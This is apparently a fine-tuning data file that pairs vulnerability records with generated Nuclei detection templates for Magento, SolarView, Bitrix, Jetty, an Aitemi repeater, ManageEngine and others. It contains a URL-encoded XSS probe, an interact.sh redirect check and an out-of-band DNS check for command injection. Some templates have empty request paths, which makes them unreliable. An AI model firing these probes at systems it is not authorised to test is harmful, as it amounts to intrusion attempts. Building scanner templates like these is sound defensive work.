"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "public-actiontrail-bucket",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "ack-cluster-api-public",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"ack"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "magento-installer",
"info": {
"name": "Magento Installation Wizard",
"author": "DhiyaneshDk",
"severity": "high",
"description": "Magento is susceptible to the Installation page exposure due to misconfiguration.",
"tags": [
"misconfig",
"magento",
"install",
"exposure",
"vuln"
],
"reference": []
},
"requests": [
{
"method": "GET",
"path": [
"{{BaseURL}}/index.php/install/"
],
"matchers": [
{
"type": "word",
"part": "body",
"words": [
"Magento Installation Wizard",
"Welcome to Magento's Installation Wizard!"
],
"condition": "and"
},
{
"type": "word",
"part": "header",
"words": [
"text/html"
]
},
{
"type": "status",
"status": [
200
]
}
],
"matchers_condition": "and"
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-magento-installer",
"timestamp": "2025-11-13T15:15:50.995102Z"
}
}
|
CVE-2023-29919
|
[CANONICAL_RECORD]
{
"cve_id": "CVE-2023-29919",
"summary": "SolarView Compact <= 6.0 is vulnerable to Insecure Permissions. Any file on the server can be read or modified because texteditor.php is not restricted.",
"affected_products": [
{
"vendor": "contec",
"product": "solarview_compact_firmware",
"version_range": "<= 6.0"
}
],
"paths": [],
"indicators": [
"error",
"vulnerability detected"
],
"severity_hint": "critical"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "cve-2022-42475",
"severity": "critical",
"tags": [
"cve",
"cve2024",
"ssl-vpn",
"vpn",
"fortios",
"fortigate",
"heap-based",
"bufferoverflow",
"kev",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/remote/login",
"{{BaseURL}}/login"
],
"matcher_types": [
"dsl"
]
}
]
},
{
"id": "cve-2023-2986",
"severity": "critical",
"tags": [
"cve",
"cve2023",
"wordpress",
"woocommerce",
"wp-plugin",
"auth-bypass",
"woocommerce-abandoned-cart",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(.*:)','')}}"
],
"matcher_types": [
"status"
]
},
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(:.*)','')}}"
],
"matcher_types": [
"word",
"word",
"status"
]
}
]
},
{
"id": "cve-2023-2640",
"severity": "high",
"tags": [
"cve",
"cve2023",
"code",
"packetstorm",
"kernel",
"ubuntu",
"linux",
"privesc",
"local",
"canonical",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[
{
"source": "nvd",
"url": "https://github.com/xiaosed/CVE-2023-29919/",
"snippet": "PoC available at https://github.com/xiaosed/CVE-2023-29919/"
},
{
"source": "nvd",
"url": "https://github.com/xiaosed/CVE-2023-29919/",
"snippet": "PoC available at https://github.com/xiaosed/CVE-2023-29919/"
}
]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "cve-2023-29919",
"info": {
"name": "SolarView Compact <= 6.00 - Local File Inclusion",
"author": "For3stCo1d",
"severity": "critical",
"description": "There is an arbitrary read file vulnerability in SolarView Compact 6.00 and below, attackers can bypass authentication to read files through texteditor.php\n",
"tags": [
"cve",
"cve2023",
"lfi",
"solarview",
"edb",
"contec",
"vkev",
"vuln"
],
"reference": [
"https://github.com/xiaosed/CVE-2023-29919",
"https://nvd.nist.gov/vuln/detail/CVE-2023-29919",
"https://www.solarview.io/",
"https://github.com/nomi-sec/PoC-in-GitHub"
]
},
"requests": [
{
"method": "GET",
"path": [],
"matchers": [
{
"type": "word",
"part": "body",
"words": [
"action=\"texteditor.php\"",
"adduser.conf",
"deluser.conf"
],
"condition": "and"
},
{
"type": "word",
"part": "header",
"words": [
"text/html"
]
},
{
"type": "status",
"status": [
200
]
}
],
"matchers_condition": "and"
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-CVE-2023-29919",
"timestamp": "2025-11-13T15:15:45.301742Z"
}
}
|
CWE-601
|
[CANONICAL_RECORD]
{
"cve_id": "CWE-601",
"summary": "The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect.",
"affected_products": [],
"paths": [],
"indicators": [
"vulnerability detected",
"error"
],
"severity_hint": "high"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "elasticbeanstalk-takeover",
"severity": "high",
"tags": [
"dns",
"takeover",
"aws",
"elasticbeanstalk",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "azure-takeover-detection",
"severity": "high",
"tags": [
"dns",
"takeover",
"azure",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "detect-dangling-cname",
"severity": "info",
"tags": [
"dns",
"takeover",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "bitrix-open-redirect",
"info": {
"name": "Bitrix Site Management Russia 2.0 - Open Redirect",
"author": "pikpikcu,gtrrnr",
"severity": "medium",
"description": "Bitrix Site Management Russia 2.0 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.",
"tags": [
"redirect",
"bitrix",
"packetstorm",
"vuln"
],
"reference": [
"https://packetstormsecurity.com/files/151955/1C-Bitrix-Site-Management-Russia-2.0-Open-Redirection.html"
]
},
"requests": [
{
"method": "GET",
"path": [
"{{BaseURL}}{{paths}}"
],
"matchers": [
{
"type": "regex",
"part": "header",
"regex": [
"(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"
]
},
{
"type": "status",
"status": [
302,
301
],
"condition": "or"
}
],
"matchers_condition": "and",
"stop_at_first_match": true
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-bitrix-open-redirect",
"timestamp": "2025-11-13T15:16:07.054202Z"
}
}
|
jetty-showcontexts-enable
|
[CANONICAL_RECORD]
{
"cve_id": "jetty-showcontexts-enable",
"summary": "Jetty showContexts is Enabled in DefaultHandler. This template detects Jetty showContexts Enable in DefaultHandler by checking specific patterns and responses.",
"affected_products": [],
"paths": [
"{{BaseURL}}"
],
"indicators": [
"Contexts known to this server are:"
],
"severity_hint": "low"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "multi-region-logging-disabled",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "public-actiontrail-bucket",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "ack-cluster-auditing-disable",
"severity": "low",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"ack"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "jetty-showcontexts-enable",
"info": {
"name": "Jetty showContexts Enable in DefaultHandler",
"author": "dhiyaneshDK",
"severity": "low",
"description": "Jetty showContexts is Enabled in DefaultHandler",
"tags": [
"jetty",
"misconfig",
"vuln"
],
"reference": [
"https://github.com/jaeles-project/jaeles-signatures/blob/master/common/jetty-showcontexts-enable.yaml",
"https://swarm.ptsecurity.com/jetty-features-for-hacking-web-apps/"
]
},
"requests": [
{
"method": "GET",
"path": [
"{{BaseURL}}"
],
"matchers": [
{
"type": "word",
"words": [
"Contexts known to this server are:"
]
},
{
"type": "status",
"status": [
404
]
}
],
"matchers_condition": "and"
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-jetty-showcontexts-enable",
"timestamp": "2025-11-13T15:15:51.125174Z"
}
}
|
oneblog-detect
|
[CANONICAL_RECORD]
{
"cve_id": "oneblog-detect",
"summary": "OneBlog Detect. This template detects OneBlog Detect by checking specific patterns and responses.",
"affected_products": [],
"paths": [
"{{BaseURL}}"
],
"indicators": [
"<title>OneBlog\u5f00\u6e90\u535a\u5ba2\u540e\u53f0\u7ba1\u7406\u7cfb\u7edf</title>",
"<meta name=\"keywords\" content=\"OneBlog"
],
"severity_hint": "info"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "multi-region-logging-disabled",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "public-actiontrail-bucket",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "alibaba-cloud-code-env",
"severity": "info",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "oneblog-detect",
"info": {
"name": "OneBlog Detect",
"author": "pikpikcu,daffainfo",
"severity": "info",
"description": "OneBlog Detect. This template detects security vulnerabilities.",
"tags": [
"tech",
"oneblog",
"discovery"
],
"reference": []
},
"requests": [
{
"method": "GET",
"path": [
"{{BaseURL}}"
],
"matchers": [
{
"type": "word",
"part": "body",
"words": [
"<title>OneBlog\u5f00\u6e90\u535a\u5ba2\u540e\u53f0\u7ba1\u7406\u7cfb\u7edf</title>",
"<meta name=\"keywords\" content=\"OneBlog"
],
"condition": "or"
},
{
"type": "status",
"status": [
200
]
}
],
"matchers_condition": "and"
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-oneblog-detect",
"timestamp": "2025-11-13T15:15:53.416168Z"
}
}
|
espeasy-mega-exposure
|
[CANONICAL_RECORD]
{
"cve_id": "espeasy-mega-exposure",
"summary": "ESPEasy Mega Panel is exposed.. This template detects ESPEasy Mega Panel Exposure by checking specific patterns and responses.",
"affected_products": [],
"paths": [
"{{BaseURL}}"
],
"indicators": [
"ESP Easy Mega:",
"Config",
"Tools"
],
"severity_hint": "high"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "multi-region-logging-disabled",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "public-actiontrail-bucket",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "ack-cluster-api-public",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"ack"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "espeasy-mega-exposure",
"info": {
"name": "ESPEasy Mega Panel Exposure",
"author": "ritikchaddha",
"severity": "high",
"description": "ESPEasy Mega Panel is exposed.",
"tags": [
"misconfig",
"espeasy",
"exposure",
"vuln"
],
"reference": []
},
"requests": [
{
"method": "GET",
"path": [
"{{BaseURL}}"
],
"matchers": [
{
"type": "word",
"part": "body",
"words": [
"ESP Easy Mega:",
"Config",
"Tools"
],
"condition": "and"
},
{
"type": "status",
"status": [
200
]
}
],
"matchers_condition": "and"
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-espeasy-mega-exposure",
"timestamp": "2025-11-13T15:15:50.827496Z"
}
}
|
gcloud-nat-static-ip-unconfigured
|
[CANONICAL_RECORD]
{
"cve_id": "gcloud-nat-static-ip-unconfigured",
"summary": "Ensure that your Google Cloud NAT gateways are configured to use static reserved external IPs in order to maintain consistent outbound IP addresses, which are critical for services requiring IP allowlisting, auditing, or compliance.\n",
"affected_products": [],
"paths": [],
"indicators": [
"Cloud NAT Gateways Not Configured with Reserved Static IPs",
"detected"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "multi-region-logging-disabled",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "public-actiontrail-bucket",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "ack-cluster-cloud-monitor-disable",
"severity": "medium",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"ack"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "gcloud-nat-static-ip-unconfigured",
"info": {
"name": "Cloud NAT Gateways Not Configured with Reserved Static IPs",
"author": "princechaddha",
"severity": "medium",
"description": "Ensure that your Google Cloud NAT gateways are configured to use static reserved external IPs in order to maintain consistent outbound IP addresses, which are critical for services requiring IP allowlisting, auditing, or compliance.\n",
"tags": [
"cloud",
"devops",
"gcp",
"gcloud",
"google-cloud-nat",
"gcp-cloud-config"
],
"reference": [
"https://cloud.google.com/nat/docs/using-nat"
]
},
"requests": [
{
"method": "GET",
"path": [
"/"
],
"matchers": [
{
"type": "status",
"status": [
200
]
}
]
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-gcloud-nat-static-ip-unconfigured",
"timestamp": "2025-11-13T15:15:38.515214Z"
}
}
|
CVE-2025-34152
|
[CANONICAL_RECORD]
{
"cve_id": "CVE-2025-34152",
"summary": "An unauthenticated OS command injection vulnerability exists in the Shenzhen Aitemi M300 Wi-Fi Repeater (hardware model MT02) via the 'time' parameter of the '/protocol.csp?' endpoint. The input is processed by the internal date '-s' command without rebooting or disrupting HTTP service. Unlike other injection points, this vector allows remote compromise without triggering visible configuration changes.",
"affected_products": [],
"paths": [],
"indicators": [
"error",
"vulnerability detected"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "cve-2020-0646",
"severity": "critical",
"tags": [
"cve",
"cve2020",
"net-framework",
"sharepoint",
"microsoft",
"packetstorm",
"rce",
"kev",
"oast",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "cve-2023-2986",
"severity": "critical",
"tags": [
"cve",
"cve2023",
"wordpress",
"woocommerce",
"wp-plugin",
"auth-bypass",
"woocommerce-abandoned-cart",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(.*:)','')}}"
],
"matcher_types": [
"status"
]
},
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(:.*)','')}}"
],
"matcher_types": [
"word",
"word",
"status"
]
}
]
},
{
"id": "cve-2019-0604",
"severity": "critical",
"tags": [
"cve",
"cve2019",
"sharepoint",
"microsoft",
"rce",
"kev",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "cve-2025-34152",
"info": {
"name": "Shenzhen Aitemi M300 Wi-Fi Repeater \u2013 Unauthenticated Remote Command Execution via `time` Parameter",
"author": "Chocapikk,DhiyaneshDk",
"severity": "critical",
"description": "An unauthenticated OS command injection vulnerability exists in the Shenzhen Aitemi M300 Wi-Fi Repeater (hardware model MT02) via the 'time' parameter of the '/protocol.csp?' endpoint. The input is processed by the internal date '-s' command without rebooting or disrupting HTTP service. Unlike other injection points, this vector allows remote compromise without triggering visible configuration changes.\n",
"tags": [
"cve",
"cve2025",
"aitemi",
"m300",
"wifi",
"unauth",
"rce",
"vkev",
"vuln"
],
"reference": [
"https://chocapikk.com/posts/2025/when-a-wifi-name-gives-you-root-part-two/",
"https://github.com/rapid7/metasploit-framework/pull/20455/files",
"https://nvd.nist.gov/vuln/detail/CVE-2025-34152"
]
},
"requests": [
{
"method": "GET",
"path": [],
"matchers": [
{
"type": "dsl",
"dsl": [
"contains(interactsh_protocol, \"dns\")",
"contains_all(body, \"error\",\"opt\")",
"contains(content_type, \"text/plain\")"
],
"condition": "and"
}
]
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-CVE-2025-34152",
"timestamp": "2025-11-13T15:15:47.440652Z"
}
}
|
CVE-2012-4889
|
[CANONICAL_RECORD]
{
"cve_id": "CVE-2012-4889",
"summary": "Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do.",
"affected_products": [
{
"vendor": "manageengine",
"product": "firewall_analyzer",
"version_range": "*"
}
],
"paths": [],
"indicators": [
"error",
"vulnerability detected"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "cve-2019-14287",
"severity": "high",
"tags": [
"packetstorm",
"cve",
"cve2019",
"sudo",
"code",
"linux",
"privesc",
"local",
"canonical",
"sudo_project",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "cve-2021-3156",
"severity": "high",
"tags": [
"packetstorm",
"cve",
"cve2021",
"sudo",
"code",
"linux",
"privesc",
"local",
"kev",
"sudo_project",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "cve-2019-0604",
"severity": "critical",
"tags": [
"cve",
"cve2019",
"sharepoint",
"microsoft",
"rce",
"kev",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[
{
"source": "nvd",
"url": "http://packetstormsecurity.org/files/111474/VL-437.txt",
"snippet": "PoC available at http://packetstormsecurity.org/files/111474/VL-437.txt"
}
]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "cve-2012-4889",
"info": {
"name": "ManageEngine Firewall Analyzer 7.2 - Cross-Site Scripting",
"author": "daffainfo",
"severity": "medium",
"description": "Multiple cross-site scripting vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do.",
"tags": [
"cve",
"cve2012",
"xss",
"manageengine",
"packetstorm",
"vuln"
],
"reference": [
"https://nvd.nist.gov/vuln/detail/CVE-2012-4889",
"http://packetstormsecurity.org/files/111474/VL-437.txt",
"http://www.vulnerability-lab.com/get_content.php?id=437",
"https://exchange.xforce.ibmcloud.com/vulnerabilities/74538",
"https://github.com/ARPSyndicate/kenzer-templates"
]
},
"requests": [
{
"method": "GET",
"path": [
"{{BaseURL}}/fw/syslogViewer.do?port=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
],
"matchers": [
{
"type": "word",
"part": "body",
"words": [
"</script><script>alert(document.domain)</script>"
]
},
{
"type": "word",
"part": "header",
"words": [
"text/html"
]
},
{
"type": "status",
"status": [
200
]
}
],
"matchers_condition": "and"
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-CVE-2012-4889",
"timestamp": "2025-11-13T15:15:40.591950Z"
}
}
|
tasmota-config-webui
|
[CANONICAL_RECORD]
{
"cve_id": "tasmota-config-webui",
"summary": "Tasmota configuration is exposed.. This template detects Tasmota Configuration Exposure by checking specific patterns and responses.",
"affected_products": [],
"paths": [
"{{BaseURL}}"
],
"indicators": [
"Firmware",
"Tasmota",
"Theo Arends",
"<h2>Tasmota</h2>"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "multi-region-logging-disabled",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "public-actiontrail-bucket",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "ack-cluster-cloud-monitor-disable",
"severity": "medium",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"ack"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "tasmota-config-webui",
"info": {
"name": "Tasmota Configuration Exposure",
"author": "ritikchaddha",
"severity": "medium",
"description": "Tasmota configuration is exposed.",
"tags": [
"misconfig",
"tasmota",
"exposure",
"config",
"vuln"
],
"reference": [
"https://github.com/arendst/Tasmota"
]
},
"requests": [
{
"method": "GET",
"path": [
"{{BaseURL}}"
],
"matchers": [
{
"type": "word",
"part": "body",
"words": [
"Firmware",
"Tasmota"
],
"condition": "and"
},
{
"type": "word",
"part": "body",
"words": [
"Theo Arends",
"<h2>Tasmota</h2>"
],
"condition": "and"
}
],
"matchers_condition": "or"
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-tasmota-config-webui",
"timestamp": "2025-11-13T15:15:51.381973Z"
}
}
|
CVE-2024-4434
|
[CANONICAL_RECORD]
{
"cve_id": "CVE-2024-4434",
"summary": "The LearnPress \u2013 WordPress LMS Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018term_id\u2019 parameter in versions up to, and including, 4.2.6.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.",
"affected_products": [
{
"vendor": "thimpress",
"product": "learnpress",
"version_range": "< 4.2.6.6"
}
],
"paths": [],
"indicators": [
"error",
"vulnerability detected"
],
"severity_hint": "critical"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "cve-2022-42475",
"severity": "critical",
"tags": [
"cve",
"cve2024",
"ssl-vpn",
"vpn",
"fortios",
"fortigate",
"heap-based",
"bufferoverflow",
"kev",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/remote/login",
"{{BaseURL}}/login"
],
"matcher_types": [
"dsl"
]
}
]
},
{
"id": "cve-2023-2986",
"severity": "critical",
"tags": [
"cve",
"cve2023",
"wordpress",
"woocommerce",
"wp-plugin",
"auth-bypass",
"woocommerce-abandoned-cart",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(.*:)','')}}"
],
"matcher_types": [
"status"
]
},
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(:.*)','')}}"
],
"matcher_types": [
"word",
"word",
"status"
]
}
]
},
{
"id": "cve-2025-1974-k8s",
"severity": "critical",
"tags": [
"cve",
"cve2025",
"cloud",
"devops",
"kubernetes",
"ingress",
"nginx",
"k8s",
"k8s-cluster-security"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[
{
"source": "nvd",
"url": "https://inky-knuckle-2c2.notion.site/Unauthenticated-SQLI-in-Learnpress-plugin-Latest-Version-4-2-6-5-a86fe63bcc7b4c9988802688211817fd?pvs=25",
"snippet": "PoC available at https://inky-knuckle-2c2.notion.site/Unauthenticated-SQLI-in-Learnpress-plugin-Latest-Version-4-2-6-5-a86fe63bcc7b4c9988802688211817fd?pvs=25"
},
{
"source": "nvd",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2d64e1c6-1e25-4438-974d-b7da0979cc40?source=cve",
"snippet": "PoC available at https://www.wordfence.com/threat-intel/vulnerabilities/id/2d64e1c6-1e25-4438-974d-b7da0979cc40?source=cve"
},
{
"source": "nvd",
"url": "https://inky-knuckle-2c2.notion.site/Unauthenticated-SQLI-in-Learnpress-plugin-Latest-Version-4-2-6-5-a86fe63bcc7b4c9988802688211817fd?pvs=25",
"snippet": "PoC available at https://inky-knuckle-2c2.notion.site/Unauthenticated-SQLI-in-Learnpress-plugin-Latest-Version-4-2-6-5-a86fe63bcc7b4c9988802688211817fd?pvs=25"
}
]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "cve-2024-4434",
"info": {
